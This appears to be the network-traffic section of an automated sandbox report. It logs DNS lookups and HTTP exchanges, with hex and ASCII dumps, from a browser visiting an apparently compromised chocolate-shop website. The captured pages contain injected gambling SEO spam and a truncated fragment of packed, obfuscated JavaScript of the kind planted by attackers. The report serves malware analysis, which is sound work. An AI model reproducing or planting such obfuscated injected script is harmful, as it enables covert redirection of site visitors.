                                                                                                                                                              Mar 13, 2023 05:27:08.310092926 CET8.8.8.8192.168.2.30x2477No error (0)jspassport.ssl.qhimg.comjspassport.ssl.qhimg.com.qh-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:08.310092926 CET8.8.8.8192.168.2.30x2477No error (0)jspassport.ssl.qhimg.com.qh-cdn.comjspassport.ssl.qhimg.com.webcdn.360qhcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:08.310092926 CET8.8.8.8192.168.2.30x2477No error (0)jspassport.ssl.qhimg.com.webcdn.360qhcdn.com104.192.108.192A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:08.310092926 CET8.8.8.8192.168.2.30x2477No error (0)jspassport.ssl.qhimg.com.webcdn.360qhcdn.com104.192.108.23A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:08.310092926 CET8.8.8.8192.168.2.30x2477No error (0)jspassport.ssl.qhimg.com.webcdn.360qhcdn.com104.192.110.245A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:08.310092926 CET8.8.8.8192.168.2.30x2477No error (0)jspassport.ssl.qhimg.com.webcdn.360qhcdn.com104.192.108.22A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:30.583606958 CET8.8.8.8192.168.2.30xe5eNo error (0)www.hkwp.com43.241.73.144A (IP address)IN (0x0001)false
                                                                                                                                                              • clients2.google.com
                                                                                                                                                              • accounts.google.com
                                                                                                                                                              • www.gourmethousemacau.com
                                                                                                                                                                • www.tbty20000.com
                                                                                                                                                                • jspassport.ssl.qhimg.com
                                                                                                                                                                • s.ssl.qhres2.com
                                                                                                                                                                • hm.baidu.com
                                                                                                                                                                • sp0.baidu.com
                                                                                                                                                                • s.360.cn
                                                                                                                                                                • api.share.baidu.com
                                                                                                                                                                • push.zhanzhang.baidu.com
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.349699142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.349700142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              10192.168.2.349749103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              11192.168.2.349730171.8.167.89443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              12192.168.2.349809104.192.108.23443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              13192.168.2.349810103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              14192.168.2.349812104.193.88.123443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              15192.168.2.349811171.8.167.89443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              16192.168.2.349815103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              17192.168.2.349820104.193.88.123443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              18192.168.2.349822103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              19192.168.2.349821171.8.167.89443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              2192.168.2.34971023.251.32.116443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              20192.168.2.34970259.188.3.13280C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:04.901396990 CET330OUTGET / HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:05.112072945 CET331INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Content-Length: 14526
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Set-Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; path=/
                                                                                                                                                              Cache-control: private
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 61 67 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 6d 61 74 3d 78 68 74 6d 6c 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 6f 75 72 6d 65 74 68 6f 75 73 65 6d 61 63 61 75 2e 63 6f 6d 2f 6d 2e 68 74 6d 6c 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 61 67 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 6d 61 74 3d 68 74 6d 6c 35 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 6f 75 72 6d 65 74 68 6f 75 73 65 6d 61 63 61 75 2e 63 6f 6d 2f 6d 2e 68 74 6d 6c 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 6d 65 64 69 61 3d 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6f 75 72 6d 65 74 68 6f 75 73 65 6d 61 63 61 75 2e 63 6f 6d 2f 6d 2e 68 74 6d 6c 22 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 30 30 38 30 3b 26 23 32 39 36 39 39 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 33 34 34 38 3b 26 23 33 32 35 39 33 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 37 38 38 30 3b 26 23 32 30 38 37 36 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 33 30 33 33 31 3b 26 23 32 34
                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="applicable-device" content="pc" /> <meta name="mobile-agent" content="format=xhtml;url=http://gourmethousemacau.com/m.html"> <meta name="mobile-agent" content="format=html5;url=http://gourmethousemacau.com/m.html"> <link rel="alternate" media="only screen and(max-width: 640px)" href="http://gourmethousemacau.com/m.html"><title>&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;</title><meta name="keywords" content="&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#20080;&#29699;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#23448;&#32593;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#27880;&#20876;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#30331;&#24
                                                                                                                                                              Mar 13, 2023 05:26:05.112135887 CET332INData Raw: 34 30 35 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 30 38 33 37 3b 26
                                                                                                                                                              Data Ascii: 405;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#20837;&#21475;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#24425;&#31080;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;
                                                                                                                                                              Mar 13, 2023 05:26:05.315170050 CET334INData Raw: 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 33 34 34 38 3b 26 23 32 36 30 34 31 3b 26 23
                                                                                                                                                              Data Ascii: &#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#23448;&#26041;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#97;&#112;&#112;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#27880;
                                                                                                                                                              Mar 13, 2023 05:26:05.315238953 CET335INData Raw: 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 30 30 38 30 3b 26 23 32 39 36 39 39 3b 26 23 33 32 3b 26 23 32 31
                                                                                                                                                              Data Ascii: ;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#20080;&#29699;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#23448;&#32593;&#32;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#30331;&#2
                                                                                                                                                              Mar 13, 2023 05:26:05.315395117 CET337INData Raw: 38 37 36 3b 26 23 33 30 33 33 31 3b 26 23 32 34 34 30 35 3b 26 23 33 32 3b 26 23 32 31 31 37 30 3b 26 23 32 39 31 39 30 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 30 34 35 32 3b 26
                                                                                                                                                              Data Ascii: 876;&#30331;&#24405;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#39318;&#39029;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#30452;&#25773;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;
                                                                                                                                                              Mar 13, 2023 05:26:05.518189907 CET338INData Raw: 28 6b 5b 63 5d 29 70 3d 70 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 27 5c 5c 62 27 2b 65 28 63 29 2b 27 5c 5c 62 27 2c 27 67 27 29 2c 6b 5b 63 5d 29 3b 72 65 74 75 72 6e 20 70 7d 28 27 6e 28 66 28 70 2c 61 2c 63 2c 6b 2c 65 2c
                                                                                                                                                              Data Ascii: (k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('n(f(p,a,c,k,e,r){e=f(c){h c.o(a)};i(!\'\'.j(/^/,q)){l(c--)r[e(c)]=k[c]||e(c);k=[f(e){h r[e]}];e=f(){h\'\\\\w+\'};c=1};l(c--)i(k[c])p=p.j(s t(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[
                                                                                                                                                              Mar 13, 2023 05:26:05.518276930 CET339INData Raw: 79 70 65 3d 22 74 65 78 74 2f 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 3c 21 2d 2d 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 73 77 61 70 49 6d 67 52 65 73 74 6f 72 65 28 29 20 7b 20 2f 2f 76 33 2e 30 0d 0a 20 20 76 61 72 20 69 2c 78 2c 61 3d 64
                                                                                                                                                              Data Ascii: ype="text/JavaScript">...function MM_swapImgRestore() { //v3.0 var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;}function MM_preloadImages() { //v3.0 var d=document; if(d.images){ if(!d.MM_p)
                                                                                                                                                              Mar 13, 2023 05:26:05.518337965 CET341INData Raw: 61 67 65 73 2f 6d 65 6e 75 30 31 62 2e 6a 70 67 27 2c 27 69 6d 61 67 65 73 2f 6d 65 6e 75 30 32 62 2e 6a 70 67 27 2c 27 69 6d 61 67 65 73 2f 6d 65 6e 75 30 33 62 2e 6a 70 67 27 2c 27 69 6d 61 67 65 73 2f 6d 65 6e 75 30 35 62 2e 6a 70 67 27 2c 27
                                                                                                                                                              Data Ascii: ages/menu01b.jpg','images/menu02b.jpg','images/menu03b.jpg','images/menu05b.jpg','images/menu04b.jpg','images/menu06b.jpg')"><div id="maintab"><table width="970" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="left" valign="
                                                                                                                                                              Mar 13, 2023 05:26:05.628303051 CET385INData Raw: 49 6d 61 67 65 37 22 20 77 69 64 74 68 3d 22 36 32 22 20 68 65 69 67 68 74 3d 22 32 38 22 20 62 6f 72 64 65 72 3d 22 30 22 20 69 64 3d 22 49 6d 61 67 65 37 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 0d 0a 20 3c 74 64 20 77 69 64 74 68 3d 22 31 36 39
                                                                                                                                                              Data Ascii: Image7" width="62" height="28" border="0" id="Image7" /></a></td> <td width="169" align="left" valign="top"><a href="OurChocology.asp" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image8','','images/menu03b.jpg',1)"><img src="
                                                                                                                                                              Mar 13, 2023 05:26:05.628376961 CET386INData Raw: 74 72 3e 0d 0a 3c 74 64 20 68 65 69 67 68 74 3d 22 34 30 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 0d 0a 20 3c 2f 74 72 3e 0d 0a 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20
                                                                                                                                                              Data Ascii: tr><td height="40" align="left" valign="top">&nbsp;</td> </tr> </table> <table width="970" border="0" cellspacing="0" cellpadding="0"> <tr><td width="162" align="left" valign="top"><img src="images/indexpic01.jpg" height="350" /
                                                                                                                                                              Mar 13, 2023 05:26:05.721196890 CET607INData Raw: 22 3e 41 69 72 20 4a 6f 72 64 61 6e 20 35 20 47 72 61 70 65 3c 2f 61 3e 20 69 6e 20 73 75 63 68 20 62 65 68 61 76 69 6f 72 20 63 6f 75 6c 64 20 72 65 73 75 6c 74 20 69 6e 20 61 20 6e 6f 74 69 63 65 20 6f 66 20 76 69 6f 6c 61 74 69 6f 6e 20 66 72
                                                                                                                                                              Data Ascii: ">Air Jordan 5 Grape</a> in such behavior could result in a notice of violation from the Building Inspector. Individuals seeking individual assistance from the government will have to invest time and effort to be eligible for that assistance..
                                                                                                                                                              Mar 13, 2023 05:26:05.722497940 CET608OUTGET /m/static/font-icon/font-awesome.min.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:05.926152945 CET621INHTTP/1.1 404 Not Found
                                                                                                                                                              Content-Length: 1635
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                              Mar 13, 2023 05:26:05.930071115 CET622OUTGET /m/static/css/index_bgpc.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:06.144376040 CET645INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 3634
                                                                                                                                                              Content-Type: text/css
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:15 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "f6f134a5a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
